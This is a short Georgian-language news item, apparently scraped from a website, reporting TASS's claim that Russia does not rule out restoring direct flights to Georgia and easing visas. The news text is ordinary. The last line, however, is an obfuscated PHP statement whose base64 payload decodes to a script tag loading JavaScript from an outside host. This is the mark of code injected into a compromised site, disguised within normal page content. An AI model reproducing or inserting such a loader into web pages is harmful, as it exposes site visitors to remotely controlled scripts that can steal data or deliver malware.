celsiusi
ავერსი საქკაბელი
რუსეთი საქართველოსთან პირდაპირი ავიამიმოსვლის აღდგენას  არ გამორიცხავს. ამის შესახებ ინფორმაციას რუსული მედია “ტასი“ ავრცელებს. 
მედიის ცნობით, რუსული მხარე ასევე არ გამორიცხავს ვიზალიბერალიზაციას „აუცილებელი წინაპირობების ჩამოყალიბების“ შემთხვევაში.
„ჩვენ არ გამოვრიცხავთ ამ კუთხით გადაწყვეტილების მიღებას“, - განაცხადა რუსეთის საგარეო საქმეთა სამინისტროს დსთ-ს ქვეყნების მეოთხე დეპარტამენტის დირექტორმა, დენის გონჩარმა.
მისივე განცხადებით, აღნიშნული წინაპირობები ოფიციალური თბილისისთვის კარგად ნაცნობია.
მან ასევე აღნიშნა, რომ წელს საქართველოს ეკონომიკური ზრდის ორნიშნა მაჩვენებელი დიდწილად სწორედ რუსეთთან სავაჭრო კავშირების, რუსეთიდან გადმორიცხვებისა და ტურიზმის დამსახურებაა.
შეგახსენებთ, რომ 2019 წლის 8 ივლისიდან რუსულმა ავიაკომპანიებმა, ვლადიმერ პუტინის განკარგულებით, საქართველოს მიმართულებით  ავიამიმოსვლა დროებით შეაჩერეს, რის მიზეზიც, 20 ივნისის საპროტესტო აქციები გახდა. 
399
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");